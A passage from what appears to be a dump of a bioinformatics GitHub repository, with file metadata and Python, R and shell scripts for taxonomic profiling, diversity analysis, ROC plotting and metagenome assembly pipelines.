Family:\n\t\t\t\t\t\t\t\tprint(name_list[-1] + '\\t' + str(rate), file=Family)\n\t\t\t\t\t\n\t\t#Genus\n\t\t\t\t\tif 'genus' in level_list:\n\t\t\t\t\t\tfilename = outdir + '/' + sample + '_genus_profile.temp'\n\t\t\t\t\t\tif re.match('g__',name_list[-1]): \n\t\t\t\t\t\t\trate = int(lst[1])/int(reads_number)\n\t\t\t\t\t\t\twith open(filename, 'a') as Genus:\n\t\t\t\t\t\t\t\tprint(name_list[-1] + '\\t' + str(rate), file=Genus)\n\n\t\t#Species \n\t\t\t\t\tif 'species' in level_list:\n\t\t\t\t\t\tfilename = outdir + '/' + sample + '_species_profile.temp'\n\t\t\t\t\t\tif re.match('s__',name_list[-1]): \n\t\t\t\t\t\t\trate = int(lst[1])/int(reads_number)\n\t\t\t\t\t\t\twith open(filename, 'a') as Species:\n\t\t\t\t\t\t\t\tprint(name_list[-1] + '\\t' + str(rate), file=Species)\t\n\n# merge and output\nfor tax in level_list:\n\tframe = pd.DataFrame()\n\tdt_list = list()\n\twith open(IDlist, 'r') as idfile:\n\t\tfor line in idfile:\n\t\t\tidlist= line.strip('\\n').split('\\t')\n\t\t\tfor sample in idlist:\n\t\t\t\tfilename = outdir + '/' + sample + '_' + tax + '_profile.temp'\n\t\t\t\tdf = pd.read_table(filename,names=[sample], index_col = 0)\n\t\t\t\tdt_list.append(df)\n\t\t\tframe = pd.concat(dt_list, axis=1)\n\t\t\tframe.fillna(value=0, inplace=True)\n\t\t\toutname = outdir + '/' + tax + 'ProfileTable.xls'\n\t\t\tframe.to_csv(outname,sep='\\t') \n\nneedremove = outdir + '/*profile.temp'\nos.system('rm ' + needremove)\n"
},
{
"alpha_fraction": 0.6879350543022156,
"alphanum_fraction": 0.6983758807182312,
"avg_line_length": 25.9375,
"blob_id": "9d54ca7ab6b0151afc81eb6bf8fe9fea28f8d290",
"content_id": "3402c81150ec5a6ddc40d9ce9af8a84870c6e00a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 862,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 32,
"path": "/rat/beta/beta.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nimport sys,os,shutil\nif len(sys.argv) != 3:\n print('you silly fool~~ (hahaha kidding,please check your parameters)')\n exit()\nbetadir = sys.argv[1]\nabdfile = sys.argv[2]\ntitle = sys.argv[3]\nos.chdir(betadir)\nif not os.path.exists('Outdir'):\n\tos.makedirs('Outdir')\nelse:\n\tshutil.rmtree('Outdir')\n\tos.makedirs('Outdir')\n#generate the distance file\nos.system('python3 braycurtis.py -i ' + abdfile)\n\nos.chdir('Outdir')\nos.system('mkdir Fexpose Mexpose Frecovery Mrecovery')\n\n#split the distance file\nos.system('python3 beta_diversity.py ../braycurtis.txt ./')\n\n#merge the distance file and run anova\nparent_dir = betadir + '/Outdir'\nos.system('python3 process.py ' + parent_dir + ' ' + title)\n\n#scp the pdf files to Mac\nos.system('sh scp.sh')\n\n# print p values\nos.system('python3 pvalue.py ' + parent_dir + '>' + parent_dir + '/pvalue.txt')\n"
},
{
"alpha_fraction": 0.5040621757507324,
"alphanum_fraction": 0.5934298634529114,
"avg_line_length": 40.617645263671875,
"blob_id": "042c329a56fd0a1a0f8704f0fa94426d9b2d57ae",
"content_id": "509ce69507c5c6c005331377ff90d24e0aee7d35",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3071,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 68,
"path": "/Taxonomy/diff_label.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "\n## 在同事差异物种脚本的基础上,为箱线图生成显著性的标识 **/* 等,只适用于三组的两两标识;其他组别待开发;\n## 属水平\ngroup = ['NS', 'FS', 'CS'] # 要和下边的差异文件对应, g1,g2,g3\n\ng1_g2 = pd.read_table('genus.FS-NS.wilcox.test.xls', index_col = 0)\ng2_g3 = pd.read_table('genus.CS-FS.wilcox.test.xls', index_col = 0)\ng1_g3 = pd.read_table('genus.CS-NS.wilcox.test.xls', index_col = 0)\n\n## 同事画图文件\ndt = pd.read_table(\"genus.relab_profile.xls\", index_col = 0)\n#dt = dt.drop(['Others'], axis = 1)\ntax = list(dt.columns[1:]) # 不要 group\n#tax.remove('Others')\n\ndt_max = dt.groupby('Group').max() # 取得最大值\n#import numpy as np\n\n## g1 and g2 \ng1_g2_max = dt_max.loc[[group[0], group[1]]].max() + 0.2 # 获得两两分组物种的最大值\ng1_g2_order = g1_g2.loc[tax]\ng1_g2_order['lab'] = g1_g2_order.apply(lambda x: '***' if x.qvalue < 0.001 else ( '**' if x.qvalue < 0.01 else ('*' if x.qvalue < 0.05 else 'NA')), axis =1)\nx2 = [tax.index(item) + 1 for item in tax] # 左坐标\nx1 = [item - 0.3 for item in x2] #右坐标\nxstar = [item - 0.15 for item in x2] # ** 位置\ng1_g2_order['x1'] = x1\ng1_g2_order['x2'] = x2\ng1_g2_order['xstar'] = xstar\ng1_g2_order['y1'] = g1_g2_max.loc[tax]\ng1_g2_order['y2'] = g1_g2_max.loc[tax] + 0.1\ng1_g2_order['ystar'] = g1_g2_max.loc[tax] + 0.2\ng1_g2_sig = g1_g2_order.loc[g1_g2_order['lab'] != 'NA'].loc[:,['x1', 'x2', 'xstar', 'y1', 'y2', 'ystar', 'lab']]\ng1_g2_sig\n\n## g1 and g3 \ng1_g3_max = dt_max.loc[[group[0], group[2]]].max() + 0.2 # 或者两两分组物种的最大值\ng1_g3_order = g1_g3.loc[tax]\ng1_g3_order['lab'] = g1_g3_order.apply(lambda x: '***' if x.qvalue < 0.001 else ( '**' if x.qvalue < 0.01 else ('*' if x.qvalue < 0.05 else 'NA')), axis =1)\nx1 = [tax.index(item) + 1 - 0.3 for item in tax] \nx2 = [item + 0.6 for item in x1]\nxstar = [item - 0.3 for item in x2]\ng1_g3_order['x1'] = x1\ng1_g3_order['x2'] = x2\ng1_g3_order['xstar'] = xstar\ng1_g3_order['y1'] = g1_g3_max.loc[tax] \ng1_g3_order['y2'] = g1_g3_max.loc[tax] + 0.1\ng1_g3_order['ystar'] = g1_g3_max.loc[tax] + 0.2\ng1_g3_sig = g1_g3_order.loc[g1_g3_order['lab'] != 'NA'].loc[:,['x1', 'x2', 'xstar', 'y1', 'y2', 'ystar', 'lab']]\ng1_g3_sig\n\n\n## g2 and g3 \ng2_g3_max = dt_max.loc[[group[1], group[2]]].max() + 0.2 # 或者两两分组物种的最大值\ng2_g3_order = g2_g3.loc[tax]\ng2_g3_order['lab'] = g2_g3_order.apply(lambda x: '***' if x.qvalue < 0.001 else ( '**' if x.qvalue < 0.01 else ('*' if x.qvalue < 0.05 else 'NA')), axis =1)\nx1 = [tax.index(item) + 1 for item in tax] \nx2 = [item + 0.3 for item in x1]\nxstar = [item - 0.15 for item in x2]\ng2_g3_order['x1'] = x1\ng2_g3_order['x2'] = x2\ng2_g3_order['xstar'] = xstar\ng2_g3_order['y1'] = g2_g3_max.loc[tax]\ng2_g3_order['y2'] = g2_g3_max.loc[tax] + 0.1\ng2_g3_order['ystar'] = g2_g3_max.loc[tax] + 0.2\ng2_g3_sig = g2_g3_order.loc[g2_g3_order['lab'] != 'NA'].loc[:,['x1', 'x2', 'xstar', 'y1', 'y2', 'ystar', 'lab']]\ng2_g3_sig\n\nall_dt = pd.concat([g1_g2_sig,g1_g3_sig, g2_g3_sig])\nall_dt.to_csv('genus_plabel.txt', sep = '\\t')\n"
},
{
"alpha_fraction": 0.7178988456726074,
"alphanum_fraction": 0.731517493724823,
"avg_line_length": 50.29999923706055,
"blob_id": "55c2776724a1cf2e3042a04b61d452f87d759d5b",
"content_id": "97a4a753d7bcec8a8707bf7bae3edaacce80fc79",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 724,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 10,
"path": "/numToid.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#过滤出来至少在 10% 样品中存在的基因编号后,需要得到相应的基因 ID (因为之前基因长度文件配置的缘故,现在要替换回来).没有用字典,试着用 pandas 的 concat 功能, 将两个数据集按照行索引取交集合并,提取编号和与之对应的 ID, 单独输出到文件.\n#主要是想多试试用 pandas.\n\n#! /usr/bin/python3\nimport pandas as pd\ndf = pd.read_table('tempNon-redundant_Gene_Catalog_length_gc.xls.gz', compression='gzip', header=0, index_col=0)\ndt = pd.read_table('GeneOfTen.txt', header=None, names=['geneNum','sampleNum'], index_col=0)\nmerge = pd.concat([df,dt], axis=1, join='inner')\nnumToid = merge['Name']\nnumToid.to_csv('numToid.txt', sep='\\t')\n\n"
},
{
"alpha_fraction": 0.7430199384689331,
"alphanum_fraction": 0.7498575448989868,
"avg_line_length": 49.14285659790039,
"blob_id": "bc1809466e1a6083ad599b751ba5ec973ccaaff4",
"content_id": "f4ae46d84a1fa6eea008791a3bff54493d2a7354",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1837,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 35,
"path": "/split_by_sex.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\n# 合并暴露期和恢复期不同剂量的,由性别分割,重新生成四个多样性的表格,用于 annova 的差异检验\nimport pandas as pd\ndt = pd.read_table('diversity.txt', header=0)\ndt.columns.values[0] = 'SampleID'\ndf = dt.set_index('SampleID')\n\n\n# diversity file \nrecoveryDf = df.loc[df.index.str.contains('-a'),:]\nexposeDf = df.loc[df.index.str.contains('-a') == False,:]\nFexposeDf = exposeDf.loc[exposeDf.index.str.contains('F\\d', regex=True),:]\nMexposeDf = exposeDf.loc[exposeDf.index.str.contains('F\\d', regex=True) == False,:]\nFrecoveryDf = recoveryDf.loc[recoveryDf.index.str.contains('F\\d', regex=True),:]\nMrecoveryDf = recoveryDf.loc[recoveryDf.index.str.contains('F\\d', regex=True) == False,:]\n\n#group file\nexposeGroup = pd.read_table('Sample_information_detail.txt', header=0, index_col=0)\nrecoveryGroup = pd.read_table('2_Sample_information_detail.xls', header=0, index_col=0)\nFexposeGroup = exposeGroup.loc[exposeGroup.index.str.contains('F\\d', regex=True),:]\nMexposeGroup = exposeGroup.loc[exposeGroup.index.str.contains('F\\d', regex=True) == False,:]\nFrecoveryGroup = recoveryGroup.loc[recoveryGroup.index.str.contains('F\\d', regex=True),:]\nMrecoveryGroup = recoveryGroup.loc[recoveryGroup.index.str.contains('F\\d', regex=True) == False,:]\n\n# merge file for R analysis\nFexposeDiversity = pd.concat([FexposeDf,FexposeGroup], axis=1)\nMexposeDiversity = pd.concat([MexposeDf,MexposeGroup], axis=1)\nFrecoveryDiversity = pd.concat([FrecoveryDf,FrecoveryGroup], axis=1)\nMrecoveryDiversity = pd.concat([MrecoveryDf,MrecoveryGroup], axis=1)\n\n# output\nFexposeDiversity.to_csv('FexposeDiversity.txt', sep='\\t')\nMexposeDiversity.to_csv('MexposeDiversity.txt', sep='\\t')\nFrecoveryDiversity.to_csv('FrecoveryDiversity.txt', sep='\\t')\nMrecoveryDiversity.to_csv('MrecoveryDiversity.txt', sep='\\t')\n"
},
{
"alpha_fraction": 0.5833333134651184,
"alphanum_fraction": 0.5833333134651184,
"avg_line_length": 11,
"blob_id": "0850dec03013855b7e15a7a6335f6d2f6c8b7790",
"content_id": "35ab15a573221abcf90c3c26673451cf15381e1e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 28,
"license_type": "no_license",
"max_line_length": 11,
"num_lines": 1,
"path": "/Paper_information/files/README.md",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "脚本需要的文件 +。+\n"
},
{
"alpha_fraction": 0.6095772385597229,
"alphanum_fraction": 0.664365828037262,
"avg_line_length": 58.410255432128906,
"blob_id": "30d8a8512dd8768a1621c0d24bd03a2d94064a40",
"content_id": "2aca536da5ae4e8de942812a07ff0312378c0250",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 2628,
"license_type": "no_license",
"max_line_length": 241,
"num_lines": 39,
"path": "/Phenotype/multi_roc.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#使用 pROC 画表型数据的多条 ROC\nlibrary(pROC) # install with install.packages(\"pROC\")\nlibrary(randomForest) \nlibrary(dplyr)\ndt = read.table('Phenotype.xls', sep = '\\t', head = T, row.names = 1) # 表型文件,格式:列名为样品名,组别以及表型信息;\n\ntemp = rownames(dt)\ndt = dt %>% mutate(Disease = ifelse(Group == 'NCA', 0, 1)) # 增加一列,将组别信息转化为 0,1\nrownames(dt)= temp\nhead(dt)\n\n#par(mar=c(3, 3, 3, 2))\npdf(\"phenotype_roc.pdf\",width=3, height=3, onefile=FALSE) # 因为表型有不少缺失值,剔除\nsub_dt = dt[complete.cases(dt['TC']),]\nrf.model <- randomForest(factor(sub_dt$Disease) ~ sub_dt$TC)\nroc(sub_dt$Disease, rf.model$votes[,1], plot=TRUE, legacy.axes=TRUE, xlab=\"1 - specificity\", ylab=\"sensitivity\", col=\"#3fadaf\", lwd=1, print.auc=F, print.auc.cex=0.5, cex.lab=0.7, cex.axis = 0.7, tck = -0.02, mgp=c(1,0.2,0)) #调整画图的参数;\n#p = roc(sub_dt$Disease, rf.model$votes[,1], plot=TRUE, legacy.axes=TRUE, xlab=\"1 - specificity\", ylab=\"sensitivity\", col=\"#3fadaf\", lwd=1, print.auc=F, print.auc.cex=0.5, cex.lab=0.7, cex.axis = 0.7, tck = -0.02, mgp=c(1,0.2,0)) #调整画图的参数;\n#print(p$auc) # 这样可以直接输出 auc 值;\n\nsub_dt = dt[complete.cases(dt['LDLC']),]\nrf.model <- randomForest(factor(sub_dt$Disease) ~ sub_dt$LDLC)\nplot.roc(sub_dt$Disease, rf.model$votes[,1] , col=\"#ca5477\", lwd=1, print.auc=F, print.auc.cex=0.5, add=TRUE, print.auc.y=0.45) # 所有的 print.auc 设置为否,因为出来不好看,后边在 legend 需要自定义\n\nsub_dt = dt[complete.cases(dt['cTnI']),]\nrf.model <- randomForest(factor(sub_dt$Disease) ~ sub_dt$cTnI)\nplot.roc(sub_dt$Disease, rf.model$votes[,1], col=\"#76a44a\", lwd=1, print.auc=F, add=TRUE, print.auc.cex=0.5, print.auc.y=0.4)\n\nsub_dt = dt[complete.cases(dt['CKMB']),]\nrf.model <- randomForest(factor(sub_dt$Disease) ~ sub_dt$CKMB)\nplot.roc(sub_dt$Disease, rf.model$votes[,1], col=\"#946ec6\", lwd=1, print.auc=F, add=TRUE, print.auc.cex=0.5, print.auc.y=0.35)\n\nsub_dt = dt[complete.cases(dt['MYO']),]\nrf.model <- randomForest(factor(sub_dt$Disease) ~ sub_dt$MYO)\nplot.roc(sub_dt$Disease, rf.model$votes[,1], col=\"#c57b3d\", lwd=1, print.auc=F, add=TRUE, print.auc.cex=0.5, print.auc.y=0.3)\n\nlegend(\"bottomright\", legend=c(\"TC_AUC: 0.609\", \"LDLC_AUC: 0.616\", \"CKMB_AUC: 0.671\", \"MYO_AUC: 0.842\", \"cTnI_AUC: 0.866\"), col=c(\"#3fadaf\", \"#ca5477\", \"#946ec6\", \"#c57b3d\", \"#76a44a\"), lwd=1, cex=0.31, pt.cex = 1, bty = \"n\") # legend 以及参数\ndev.off()\n\n# 这里手动输入 图例元素 还是有点儿笨拙,待优化,时间关系,后边再说,完成任务最重要;\n\n"
},
{
"alpha_fraction": 0.6770833134651184,
"alphanum_fraction": 0.7604166865348816,
"avg_line_length": 23,
"blob_id": "91f5f17cea9f201c47875dc32a6f62853937aabb",
"content_id": "62007f64af8d4f027cb9c8b7f0f8cd4bfe3170f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 104,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 4,
"path": "/rat/scp.sh",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "for x in `ls *pdf`\ndo\n\texpect scp.expect $x /Users/tongxueer/Documents/20180116-大鼠项目/genus\ndone\n"
},
{
"alpha_fraction": 0.7008309960365295,
"alphanum_fraction": 0.7091412544250488,
"avg_line_length": 44,
"blob_id": "f55a21eb592247a45f22e8fd8f72b1dc65176b01",
"content_id": "e2d42bf04106524ec93b169ed36542515058d995",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 473,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 8,
"path": "/calypso.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 将物种丰度表处理成 Calyps 软件能够接受的输入文件\nimport pandas as pd\ndt = pd.read_table('phylumProfileTable.xls')\nPhylum = pd.Series(['phylum'] * len(dt.index.values)) #生成和行数相同的 phylum \ndt = pd.concat([Phylum,dt], axis=1) # 合并,横向合并\ndt.columns.values[0] = 'Phylum' \ndt.columns.values[1] = 'Header' #对列名进行重命名\ndt.to_csv('Calypso_phylum.txt', sep='\\t', index=False) #输出,并且关闭输出掉索引值\n\n"
},
{
"alpha_fraction": 0.534246563911438,
"alphanum_fraction": 0.5391389727592468,
"avg_line_length": 39.880001068115234,
"blob_id": "51dfa19937296d442c1d02da0c2508b02b510462",
"content_id": "3967bf0cd2e56ae0cf6b18c4d8ae94c65cbf40c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1192,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 25,
"path": "/Phenotype/con_result.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 接同事对连续型变量差异检验的文件,输出发表文章格式的表格;之所以离散型和连续型变量分开,是因为两种数据的处理方式不一样,后边再找机会看能不能合并吧;\n# 输出格式为 mean(sd) ... p 值\nimport re\ngroup_list = 'NS:FS:CS'.split(':')\nindice = 'Age:BMI'.split(':')\nout = open('Final_Result.NS-FS-CS.mixcon.xls', 'w')\ndt = pd.read_table('Result.NS-FS-CS.mixcon.xls', sep = '\\t', index_col = 0)\nprint('Characteristic\\t' + '\\t'.join(group_list) + '\\tP value', file = out)\nfor x in indice:\n # print(x +',mean(sd)' + '\\t'*len(group_list) + '%.2e' % dt.loc[x]['pvalue'])\n sub_dt = dt.loc[x]\n line = ''\n for group in group_list:\n Mean = 'mean('+ group + ')' \n Sd = 'sd('+ group + ')' \n for colname in sub_dt.index:\n if colname == Mean:\n group_mean = str(round(sub_dt[colname],2))\n line = line + '\\t'+ group_mean\n\n if colname == Sd:\n group_sd = '('+str(round(sub_dt[colname],2))+')'\n line = line + group_sd\n print(x +',mean(sd)' + line + '\\t%.2e' % dt.loc[x]['pvalue'], file = out) #科学计数法\nout.close()\n"
},
{
"alpha_fraction": 0.6562607288360596,
"alphanum_fraction": 0.6819897294044495,
"avg_line_length": 46.78688430786133,
"blob_id": "982a3c73ab1dca5caa73ef45cc02a4764d28160e",
"content_id": "21cc2b65b5f7caaebfa1bbb700bb015ef0f6ebc7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2915,
"license_type": "no_license",
"max_line_length": 174,
"num_lines": 61,
"path": "/getScript.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nimport argparse,os,shutil\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\n-------------------\nSimple Introduction:\nGenerate the assembly script for each sample.\nExample: python3 diversity.py -i GeneCatalog_profile.xls.gz\nTo be continued.\n------------------'''\n)\nparser.add_argument('-i','--Input', help = \"the RemoveHost_Data.list file.\")\nparser.add_argument('-s','--tool', help = \"megahit (default) or metaspades.\")\n#parser.add_argument('-p','--process', help = \"the directory for results.\")\nparser.add_argument('-o','--outdir',help = \"the output directory, full path.\")\n#parser.add_argument('-o','--outdir',help = \"the output directory,default is current working directory.\",nargs='?')\nparser.add_argument(\"-v\", \"--version\",action='version', version='%(prog)s 1.0')\nargs = parser.parse_args()\n(removeHostList,tool,outdir) = (args.Input,args.tool,args.outdir)\npar = [removeHostList,tool,outdir]\n\nif not all(par):\n\tparser.print_help()\n\texit()\n\nif os.path.exists(outdir):\n#\tos.removedirs(outdir)\n\tshutil.rmtree(outdir)\n\nos.makedirs(outdir)\t\nshelldir = outdir + '/shell'\nprocessdir = outdir + '/process'\nos.makedirs(shelldir)\nos.makedirs(processdir)\n\nwith open(removeHostList,'r') as IN:\n\tfor line in IN:\n\t\tlst = line.strip('\\n').split('\\t')\n\t\t(ID,rmfq1,rmfq2) = (lst[0],lst[1],lst[2])\n\t\tshellIDdir = shelldir + '/' + ID\n\t\tos.makedirs(shellIDdir)\n\t\tshellfile_path = shellIDdir + '/' + ID + '_assembly.sh'\n\t\tprocessIDdir = processdir + '/' + ID \n\t\tos.makedirs(processIDdir) # make sample dir\n\t\tgunzip_rmfq1_path = processIDdir +'/' + ID + '.RemoveHost_1.fastq'\n\t\tgunzip_rmfq2_path = processIDdir +'/' + ID + '.RemoveHost_2.fastq'\n\t\tmetawrap_path = '/ifswh1/BC_PUB/biosoft/BC_NQ/01.Soft/03.Soft_ALL/metaWRAP-181018/bin/metawrap'\n\t\tout = open(shellfile_path,'w') \n\t\tprint('export PATH=/ifswh1/BC_PS/wangpeng7/Software/metaWRAP-181018/bin:$PATH', file=out)\n\t\tprint('export PATH=/ifswh1/BC_PS/wangpeng7/Software/metaSPAdes/SPAdes-3.13.0-Linux/bin:$PATH', file=out)\n\t\tprint('export PATH=/ifswh1/BC_PUB/biosoft/BC_NQ/01.Soft/03.Soft_ALL/Python-2.7.5/Built/bin:$PATH', file=out) # for quast\n\t\tprint('export PATH=/ifswh1/BC_PUB/biosoft/pipeline/MICRO/Meta/Meta_Metagenomic_Survey_2017a/modules/Assembly/Assembly_megahit/bin/megahit:$PATH', file=out)\n\t\tprint('gunzip -c ' + rmfq1 + ' > ' + gunzip_rmfq1_path, file=out)\n\t\tprint('gunzip -c ' + rmfq2 + ' > ' + gunzip_rmfq2_path, file=out)\n\t\tif tool == 'metaspades':\n\t\t\tprint(metawrap_path + ' assembly -1 ' + gunzip_rmfq1_path + ' -2 ' + gunzip_rmfq2_path + ' -m 100 -t 20 --metaspades -o ' + processIDdir, file=out) # later change the par\n\t\telse:\n\t\t\tprint(metawrap_path + ' assembly -1 ' + gunzip_rmfq1_path + ' -2 ' + gunzip_rmfq2_path + ' -m 100 -t 20 --megahit -o ' + processIDdir, file=out)\n\t\tprint('rm ' + gunzip_rmfq1_path, file=out)\n \tprint('rm ' + gunzip_rmfq2_path, file=out)\n"
},
{
"alpha_fraction": 0.6399112939834595,
"alphanum_fraction": 0.6563193202018738,
"avg_line_length": 40,
"blob_id": "ab859c6e6019deeb35a20d2fb5869aac5ab935e5",
"content_id": "165f7fe30924b107eaced7122d2ae7e53f31c4c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2255,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 55,
"path": "/GeneAbundance/align.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nimport argparse,re,os,glob\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\n-------------------\nSimple Introduction:\nGenerate the process directory and shell directory of soap alignment.\nTo be continued.\n------------------'''\n)\nparser.add_argument('rmhost', help = \"the removehost fastq file list.\")\nparser.add_argument('soap', help = \"soap path.\")\nparser.add_argument('index', help = \"the index file directory.\")\nparser.add_argument('outdir',help = \"the output directory,default is current working directory.\",nargs='?')\nparser.add_argument(\"-v\", \"--version\",action='version', version='%(prog)s 1.0')\nargs=parser.parse_args()\n(listfile,soap_path,index_dir) = (args.rmhost, args.soap, args.index)\npar = [listfile,soap_path,index_dir]\noutdir = args.outdir if args.outdir else './'\n\nif not os.path.exists(outdir):\n\tos.makedirs(outdir)\t\n\nindex_list = list()\nfor item in glob.glob(index_dir + '/all_assembly.fasta.index.amb'):\n#for item in glob.glob(index_dir + '/AA11A_final_assembly.fasta.index.amb'):\n#for item in glob.glob(index_dir + '/AA12A_final_assembly.fasta.index.amb'):\n#for item in glob.glob(index_dir + '/AA4A_final_assembly.fasta.index.amb'):\n\tmatch = re.search('(.*)\\.amb', item)\n\tindex = match.group(1)\n\tindex_list.append(index)\nindex_par = '-D ' + ' -D '.join(index_list)\n#print(index_par)\n\nwith open(listfile,'r') as IN:\n\tfor line in IN:\n\t\tlst = line.strip('\\n').split('\\t')\n\t\t(sampleID,fq1,fq2) = (lst[0],lst[1],lst[2])\n\t\tprocessPath = outdir + '/Process/' + sampleID\n\t\tshellPath = outdir + '/Shell/' + sampleID\n\t\tif not os.path.exists(processPath):\n\t\t\tos.makedirs(processPath)\n\t\tif not os.path.exists(shellPath):\n\t\t\tos.makedirs(shellPath)\t\t\n\t\tfilepath = shellPath + '/' + sampleID + '.sh'\n\t\toutpe = processPath + '/' + sampleID + '.soap.pe'\n\t\toutse = processPath + '/' + sampleID +'.soap.se'\n\t\toutlog = processPath + '/' + sampleID +'.soap.log'\t\n\t\tpara = '-m 200 -x 1000 -r 2 -v 13 -p 12 -l 32 -s 75 -c 0.95'\n\t\tshell = ' '.join([soap_path,'-a',fq1,'-b',fq2, index_par,'-o',outpe,'-2',outse,para])\n\t\twith open (filepath,'w') as out:\n\t\t\tout.write(shell + ' 2>' + outlog + '\\n')\n\t\t\tout.write('gzip -f ' + outpe + '\\n')\n\t\t\tout.write('gzip -f ' + outse + '\\n')\n"
},
{
"alpha_fraction": 0.5925925970077515,
"alphanum_fraction": 0.5987654328346252,
"avg_line_length": 13.727272987365723,
"blob_id": "1c5928947e5c1bd8f690d79f84105d3cae4779a6",
"content_id": "462dc034a60b502519ffeacd12e38645450f5c4a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 162,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 11,
"path": "/GeneAbundance/qsub.sh",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "for file in shell_dir/*\ndo \n\tif test -d $file\n\tthen\n\t\tcd $file \n\t\tfor script in ${file}/*sh\n\t\tdo\n\t\t\tqsub -cwd -l vf=XG,p=1 -P XXX -q xx.q $script\n\t\tdone\n\tfi\ndone\n"
},
{
"alpha_fraction": 0.5680453777313232,
"alphanum_fraction": 0.6470980644226074,
"avg_line_length": 53.490909576416016,
"blob_id": "e2ed093b1c6afb3e999107326a4ce97e4dd5839b",
"content_id": "bf055f7ed30c49c662daf0b41c239f6ae0a509bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 3206,
"license_type": "no_license",
"max_line_length": 316,
"num_lines": 55,
"path": "/rat/diff/top.30.genus.significant_species.boxplot.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "\nlibrary(\"reshape2\",lib.loc=\"R-3.4.1/library\")\nlibrary(\"ggplot2\",lib.loc=\"R-3.4.1/library\")\ndata <- read.table(\"top.30.genus.log.txt.tt.boxplot.txt\",header=T,check.name=F,sep=\"\\t\")\ndata1 <- melt(data)\ndata1$group <- factor(data1$group,levels=c(\"Healthy\",\"SCAD\",\"UA\",\"MI\"))\ncolor <- c(\"#4daf4a\",\"#377eb8\",\"#984ea3\",\"#e41a1c\")\nfont_color <- c(\"#e41a1c\",\"#4daf4a\",\"#984ea3\",\"#000000\",\"#e41a1c\",\"#000000\",\"#4daf4a\",\"#4daf4a\",\"#000000\",\"#4daf4a\",\"#000000\",\"#4daf4a\",\"#4daf4a\",\"#fbb4ae\",\"#4daf4a\",\"#377eb8\",\"#000000\",\"#000000\",\"#000000\",\"#000000\",\"#4daf4a\",\"#000000\",\"#000000\",\"#ccebc5\",\"#e41a1c\",\"#000000\",\"#000000\",\"#4daf4a\",\"#000000\",\"#000000\")\nplot = ggplot(data1, aes(x=variable, y = value, color = group)) + \n\tstat_boxplot(geom=\"errorbar\",size=0.5, width=0.5, position=position_dodge(0.8))+\t\n\tgeom_boxplot(outlier.shape = 21, fatten=0.8,size=0.5,outlier.size=0.3,position=position_dodge(0.8)) + \n\tscale_color_manual(values= color) + \n\tlabs(y=expression(Relative~abundance~(log[\"10\"])),x=\"\",fill=\"\",color=\"\") + \n\ttheme(axis.text.x = element_text(colour=font_color,size=12,face=\"italic\", hjust=1,angle=45),\n\t\taxis.text.y = element_text(colour=\"black\",size=10),\n\t\taxis.line = element_line(color=\"black\",size=0.5),\n\t\taxis.ticks = element_line(color=\"black\",size=0.5),\n\t\tlegend.position=c(0,0),\n\t\tlegend.justification=c(0,0),\n\t\tlegend.key = element_blank(),\n\t\tlegend.text = element_text(size=10),\n\t\tlegend.background = element_blank(),\n\t\tlegend.key.width = unit(0.15, \"in\"),\n\t\tlegend.key.height = unit(0.15, \"in\"),\n\t\tpanel.background = element_blank(),\n\t\tplot.margin = unit(c(0.1, 0.1, 0.1, 0.15), \"in\")\n)\n\n# 加差异显著的 * 或者 **, 目前只支持pvalue 的 0.05 和 0.01, 后边按需修改就好, 利用下边的这段代码,其实可以对任意差异检验的的结果进行显著性标注,只要有上边的箱线图文件和下边的差异检验结果文件\nlibrary(dplyr)\ndiff_result = \"Healthy-SCAD-UA-MI.Healthy-SCAD-UA-MI.kruskal.test.xls\" # 需要改成外参\nx_order = levels(data1$variable)\ngroup_order = 